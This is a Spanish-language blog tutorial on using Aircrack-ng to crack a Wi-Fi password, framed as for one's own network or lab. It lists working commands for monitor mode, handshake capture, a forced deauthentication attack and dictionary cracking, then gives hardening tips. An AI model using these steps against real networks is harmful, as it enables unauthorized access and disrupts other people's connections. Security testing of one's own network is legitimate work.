Blog de Tecnología

Aircrack-ng — Guía paso a paso (uso autorizado)

Aircrack-ng Tutorial

Aircrack-ng — Guía paso a paso (uso autorizado)

Solo para pruebas en tu red o laboratorio controlado — comandos reales incluidos.


1. Colocar la interfaz en modo monitor

sudo airmon-ng check kill
  
sudo airmon-ng start wlan0

Esto detiene procesos que interfieren y activa wlan0mon en modo monitor. Sustituye wlan0 por tu interfaz real.

2. Escanear redes

sudo airodump-ng wlan0mon
  

Identifica el BSSID y el canal (CH) de tu red.

3. Capturar el handshake

sudo airodump-ng --bssid TU:B8:SSID:XX:XX:XX --channel 6 --write captura wlan0mon
  

Reemplaza el BSSID y el canal por los de tu red. Guarda en captura.cap.

Opción: Forzar handshake

sudo aireplay-ng --deauth 5 -a TU:B8:SSID:XX:XX:XX wlan0mon
  

Desconecta clientes para que se reconecten y capturar el handshake. Úsalo solo en tu red.

4. Analizar y probar contraseñas

sudo aircrack-ng captura.cap -w diccionario.txt
  

Reemplaza diccionario.txt por tu archivo de contraseñas. Puedes usar uno personalizado con claves que suelas utilizar.

5. Proteger tu red

  • Usa WPA3 o WPA2 con contraseña larga y aleatoria.
  • Desactiva WPS.
  • Filtra dispositivos por MAC y revisa logs periódicamente.

💡 Recuerda: este procedimiento es únicamente para tu red o laboratorio. Usarlo en redes ajenas es ilegal.

Comentarios